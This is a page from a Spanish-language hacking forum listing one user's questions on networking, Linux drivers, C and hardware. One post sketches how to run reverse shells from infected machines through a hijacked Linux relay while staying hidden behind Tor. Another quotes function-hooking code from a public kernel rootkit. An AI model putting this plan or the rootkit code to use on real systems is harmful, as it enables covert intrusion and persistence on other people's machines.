elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Top 20 herramientas Hacking más populares de 2020


  Mostrar Temas
Páginas: [1] 2 3 4 5
1  Informática / Electrónica / SO y servidor web más adecuado para usar con Raspberry Pi 3 B+ en: 14 Septiembre 2019, 21:25 pm
Buenas a todos! Quiero correr un pequeño servidor web en una Raspberry Pi 3 B+. Tengamos en cuenta que sus recursos son bastante limitados:

Broadcom BCM2837B0, Cortex-A53 (ARMv8) 64-bit SoC @ 1.4GHz
1GB LPDDR2 SDRAM

aunque no pretendo tener un servidor web con muchos clientes. De todas maneras me gustaría instalar el SO y el servidor web más liviano para trabajar con la raspberry y lograr poder procesar la mayor cantidad de requests antes de que se sature. Como SO creo que me inclino por Arch Linux, ya que viene pelado y uno le instala solo lo que necesita. Como servidor web me inclino por NGINX o lighthttpd. Quiero saber que piensan ustedes, que SO recomiendan y cuál serivor web, si NGINX o lighthttpd. Muchas gracias desde ya!

* Agrego *

Noté que hay ejemplares que se venden con un gabinete con cooler. Quería saber si creen que es recomendable comprarlo con cooler para lo que yo quiero hacer. De todos modos leí que el SoC detecta cuando la temperatura llega a los 80°C y empieza a reducir la activida para protegerse... Gracias desde ya
2  Comunicaciones / Redes / Crear una DMZ para un web server y dejar aislados el resto de equipos de la LAN en: 13 Septiembre 2019, 18:29 pm
Muy buenas a todos! Les comento lo que busco. Tengo un apache corriendo sobre una VM de linux, que es accesible por Internet. El server forma parte de mi LAN por el momento, en la que además del server hay PCs de escritorio, celulares, tv, el router. Quiero saber como aislar mi servidor web accesible por Internet del resto de mis dispositivos, para evitar que si un atacante logre tomar el control sobre mi server, no pueda hacerme ataques MITM al resto de equipos de mi red, ni explotar vulns en puertos solo accesibles desde la LAN, etc. Mi ambiente es muy casero, tengo un router TP-Link TL-WR841N. No se si necesitare hacer algo como cambiarle el firmware a mi router para poder crear VLANS, o si neceitare una VM extra con pfSense y alguna config en especial. Recuerden que el server corre sobre una VM en VirtualBox. Muchas gracias desde ya por la ayuda!
3  Comunicaciones / Redes / Dudas 10 Gigabit Ethernet y tasa de transferencia máxima ofrecida por ISP's en: 15 Agosto 2019, 19:39 pm
Que tal! Muy buenas! Estaba estudiando un poco la herramienta masscan, que puede llegar a ser muy, muy rápida para escanear puertos, si somos capaces de enviar una alta cantidad de paquetes por segundo. La herramienta indica que para lograr enviar la mayor cantidad de paquetes por segundo necesitamos una tarjeta de red con el estandar más rápido que es 10 Gigabit Ethernet junto con un driver llamado PF_RING. Algo que no indica el README.md de la herramienta tiene que ver con el límite de tasa de transferencia ofrecidos por los ISP's. Por ejemplo, Fibertel ofrece como máximo un paquete con una tasa de transferencia de 300Mb/s. Si adquiero una tarjeta de 10Gb/s, y conecto el cable que me llega de fibertel directo a la tarjeta, de todas formas tendría un cuello de botella y la tasa máxima de transferencia sería de 300Mb/s... Mi duda entonces es... En qué entorno se supone que pueda aprovechar los 10Gb/s de transferencia de la tarjeta ethernet? Que clase de proveedor podría llegar a brindarme una tasa de transferencia de 10Gb/s? Se que saldría una fortuna, pero me mata la curiosidad de saber la respuesta a ésta duda. Si estoy equivocado en algo de lo que estoy planteando, por favor corrijanme, y eviten respuestas ofensivas, solo soy una persona curiosa, ética, y con ganas de aprender. Saludos y muchas gracias desde ya!
4  Seguridad Informática / Hacking Wireless / Como un AP/STA determina inicio y fin de cada trama que llega? en: 8 Noviembre 2018, 06:38 am
Buenas! Me cuesta entender algunas cosas relacionadas con el caos de frecuencias de radio que no podemos ver, pero que los access points y adaptadores inalambricos puden captar, y determinar inicio y fin de cada paquete... Entiendo que WiFi por ejemplo usa CSMA/CA para evitar colisiones entre estaciones pertenecientes al mismo BSS... Èsto me hace entender que existe un òrden dentro del BSS, pero y los paquetes que van y vienen de/hacia otro BSS? Y còmo es que todos los paquetes no se mezclan entre si y los dispositivos puedan determinar perfectamente inicio y fin de cada trama?

Muchas gracias desde ya por ayudar a despejar mis dudas!

Saludos.
5  Seguridad Informática / Seguridad / Mantener anonimáto con TOR desde el punto de vista de un atacante(ideas y dudas) en: 31 Agosto 2018, 05:00 am
Hola gente! Buen día! Luego de las conversaciones en el foro de hace una semana sobre TOR y privacidad, decidí instalar Tortilla, una herramienta de la que había leído pero no había probado. Seguí los pasos de nuestro colega #!drvy, a través de éste post:

https://foro.elhacker.net/seguridad/tutorial_tortilla_tor_privacidad-t409824.0.html;msg1970898


y logré instalarlo satisfactoriamente, pero ahora me surgen algunas ideas, y varias dudas que me gustaría plantear y debatir... (tengan en cuenta que no pretendo implementar ninguna de las ideas que voy a mencionar al final, solo quiero informarme y sacarme dudas):

Mientras se utilice Tortilla es imposible levantar un servidor de cualquier tipo en la VM que utiliza la interfaz de red de Tortilla, asi como utilizar metasploit escuchando en un puerto en espera de una shell inversa, ya que, la única forma de conectarnos a internet es cuando nosotros somos quién inicia la conexión, ya que sino, en caso de que alguien se quiera conectar a un servicio nuestro, como nos identificaría? La IP privada de la VM es la misma que la de la máquina host, y la pública es la del exit node de tor... Entonces supongo que el que tendría que estar configurado para escuchar en un puerto y devolvernos la conexión a nosotros sería el exit node, pero al no controlarlo, se haría imposible. Corríjan por favor cualquier conclusión incorrecta de éste párrafo.

Para poder controlar remotamente otra PC previamente comprometida, la forma sería a través de una conexión directa (y no inversa), y que la PC que queremos controlar, sea la que esté escuchando en un puerto, ya que de ésta forma todo funciona perfectamente, y la PC remota vería la IP del exit node de tor y no la nuestra, como se esperaría...

Nota: cuando hablo de conexión directa, me refiero a lo contrario de la inversa, es decir, que seamos nosotros el que inicia la conexión y el destino quién esté escuchando, aunque la conexión directa la hagamos a través de TOR...

Como sabemos, conectarnos de forma directa a una PC que hayamos infectado (dejándola en escucha y siendo nosotros quien inicia la conexión), no siempre es tan sencillo, ya que puede ser que exista un NAT, y necesitemos acceder al router de la red de la pc remota para configurar el forwarding. A veces si es muy facil ya que se deja el password del router por defecto, o habilitado UPnP, lo que nos permite hacer forwarding sin saber el password, asi como posibles vulnerabilidades en los routers...

Se me ocurrió un esquema, que nos permitiría controlar cómodamente dispositivos infectados teniendo en cuenta el NAT, y manteniendo nuestro anonimato. Estoy seguro que  el esquema que yo voy a plantear es usado por muchos atacantes, pero quiero contarlo para poder debatir sobre él luego:



Como ven, la idea es que si logramos el acceso a algún servidor (preferentemente con Linux, que tenga poco tráfico y no sea muy supervisado), si éste no se encuentra detrás de un NAT, (o bien logramos controlar al NAT), podemos dejarlo escuchando en un puerto, que luego al conectarnos, nos daría una shell. Ésta conexión se podría realizar tranquilamente a través de TOR. Luego, los demás dispositivos que controlemos, que puedan estar detrás de un NAT, haremos que le envíen una reverse shell al servidor Linux que controlemos (nuestro "centro de operaciones"). De ésta forma, podemos controlar a los dispositivos finales, a través de nuestra conexión directa con el "centro de operaciones", sin necesidad de enfrentarse con el NAT de todos los dispositivos bajo nuestro control. Me parece importante tener más de un servidor de "centro de operaciones", y que los dispositivos finales se traten de conectar a los dos, para descentralizar un poco, y que si el día de mañana pasa algo en alguno de los servidores Linux, todavía tengamos el otro. Los comandos que puse de nc en la foto, son para tomar como referencia, pero podríamos usar metasploit, o en caso de los dispositivos finales, hacer que envíen la reverse shell cada X segundos, para mantener el acceso efectivamente.

Bueno, ahora que plantié dicho esquema, me gustaría discutir sobre él. Mis preguntas son: éste esquema es muy usado por atacantes? Que cambios le harían? Existe alguna alternativa mejor? Si un administrador de cualquier dispositivo final inspecciona el tráfico, vería tráfico entrante y saliente hacia el Linux de nuestra base de operaciones... El dueño del servidor, podría tener que pagar el precio de nuestras malas acciones?

Gracias desde ya!


6  Sistemas Operativos / GNU/Linux / Duda sobre driver para adaptador wireless en: 28 Agosto 2018, 03:23 am
Buenas! Les comento mi duda. Tengo Linux Mint con kernel 4.10.x. En éste mismo kernel instalé los drivers para el adaptador inalámbrico TP-LINK TL-WN722N (el famoso adaptador blanco con una antena). En un principio, antes de instalar el driver correspondiente, el SO no reconocía al adaptador. No se podía ver desde ifconfig ni iwconfig. Luego de instalar el driver correspondiente, empecé a ver la interfaz con dichas herramientas, (y también desde la parte gráfica).

Ahora cambié el adaptador por un TP-LINK TL-WN8200ND (uno más potente con 2 antenas). Linux me reconoce el dispositivo al conectarlo, pero cuando intento conectarme al wifi introduciento correctamente la contraseña, no puedo acceder, me sale el cartel de que se me desconecto (en realidad sin nunca haberse conectado). Pensé que tal vez el driver preexistente en Linux no sea el correcto, o esté desactualizado. En internet encontré guías que te explican como instalar los drivers para mi adaptador, tanto con drivers nativos para Linux, como la alternativa de instalar ndiswrapper junto con los drivers de Windows.

A todo ésto, mi duda es la siguiente: antes de instalar el nuevo driver debería deshabilitar el driver que estaba preinstalado en Linux? Se que los drivers son modulos del kernel o LKM, pero quería saber cómo darme cuenta con lsmod o cualquier otra herramienta, cuál de todos los módulos es el que se está usando como driver para mi adaptador, y si es necesario deshabilitarlo antes de instalar el nuevo driver que te muestran en las distintas guias.

Espero que hayan entendido mi duda. Cualquier otra información que necesiten, me preguntan. Gracias desde ya!!! Saludos.
7  Programación / Programación C/C++ / Obtener valor de retorno de una función antes de preprocesar en: 29 Julio 2018, 16:13 pm
Buenas que tal!!! No se si sea claro, pero voy a tratar de ser lo más genérico posible. Necesito obtener el resultado de una función para tomar una decisión antes de la etapa de preprocesamiento. Dependiendo de ese valor, tengo que tomar una decisión para definir un código u ótro código, pero el valor solo se como obtenerlo empleando una función, que se ejecuta luego del preprocesamiento... Quería saber como resolver ésta clase de problema.
8  Informática / Electrónica / Fenomeno con ondas de radio y auriculares en: 10 Julio 2018, 09:08 am
Buenas! que tal? Les quería preguntar a qué se debe éste fenómeno que estoy experimentando. Tengo mi amplificador Panasonic del 1200 antes de cristo. Éste modelo específicaemente:




y lo tengo conectado x auxiliar a la salida de audio de mi pc. Suelo enchufar mis auriculares a la salida: "phono" de dicho ampli. A veces mientras tengo la musica en pausa sin otro sonido reproduciendoce desde el pc, se oye la radio haciendo interferencia, muy tenuemente, y parpadea el led de la parte de arriba "quartz lock", que está justo al lado del display en la parte de arriba a la izqueirda del ampli.

A qué se debe éste fenómeno?
9  Programación / Programación C/C++ / Linea de código dificil de entender en: 3 Julio 2018, 02:37 am
Buenas, estaba analizando el código fuente de un kernel rootkit, y leyendo la documentación de las apis que se utilizan más o menos me estoy dando mania, aunque hay lineas que tal vez me cuestan bastante comprender, como ésta:

Código
  1. *(void **)&((char *)h->original_function)[ASM_HOOK_CODE_OFFSET] = h->modified_function;

Aquí les dejo un fragmento del rootkit para que les sea más facil entender:

Código
  1. // ========== ASM HOOK LIST ==========
  2.  
  3. #if defined __i386__
  4.    // push 0x00000000, ret
  5.    #define ASM_HOOK_CODE "\x68\x00\x00\x00\x00\xc3"
  6.    #define ASM_HOOK_CODE_OFFSET 1
  7.    // alternativly we could do `mov eax 0x00000000, jmp eax`, but it's a byte longer
  8.    //#define ASM_HOOK_CODE "\xb8\x00\x00\x00\x00\xff\xe0"
  9. #elif defined __x86_64__
  10.    // there is no push that pushes a 64-bit immidiate in x86_64,
  11.    // so we do things a bit differently:
  12.    // mov rax 0x0000000000000000, jmp rax
  13.    #define ASM_HOOK_CODE "\x48\xb8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xe0"
  14.    #define ASM_HOOK_CODE_OFFSET 2
  15. #else
  16.    #error ARCH_ERROR_MESSAGE
  17. #endif
  18.  
  19. struct asm_hook {
  20.    void *original_function;
  21.    void *modified_function;
  22.    char original_asm[sizeof(ASM_HOOK_CODE)-1];
  23.    struct list_head list;
  24. };
  25.  
  26. LIST_HEAD(asm_hook_list);
  27.  
  28. /**
  29.  * Patches machine code of the original function to call another function.
  30.  * This function should not be called directly.
  31.  */
  32. void _asm_hook_patch(struct asm_hook *h)
  33. {
  34.    DISABLE_W_PROTECTED_MEMORY
  35.    memcpy(h->original_function, ASM_HOOK_CODE, sizeof(ASM_HOOK_CODE)-1);
  36.    *(void **)&((char *)h->original_function)[ASM_HOOK_CODE_OFFSET] = h->modified_function;
  37.    ENABLE_W_PROTECTED_MEMORY
  38. }

Link del rootkit: https://github.com/nurupo/rootkit/blob/master/rootkit.c

no quiero que me expliquen todo el código, solo quiero saber como interpretar la línea que marqué más arriba (sería la línea 36 en éste fragmento).

Muchas gracias desde ya. Saludos

10  Foros Generales / Dudas Generales / Duda sobre Arduino y firmware en: 1 Junio 2018, 08:29 am
Buenas a todos! Quería saber si estoy acertado en lo que digo o si me estoy equivocando feo. Según lo que leí, el firmware es el software que controla físicamente al hardware y que se suele encontrar en chips ROM/EEPROM. Mi duda es la siguiente. Los progrmas que uno escribe y graba sobre Arduino son considerados firmware? Para mi es asi, ya que sería software que controla a los componentes físicos y se encuentra en la memoria EEPROM de Arduino. Gracias de antemano.

Saludos
Páginas: [1] 2 3 4 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines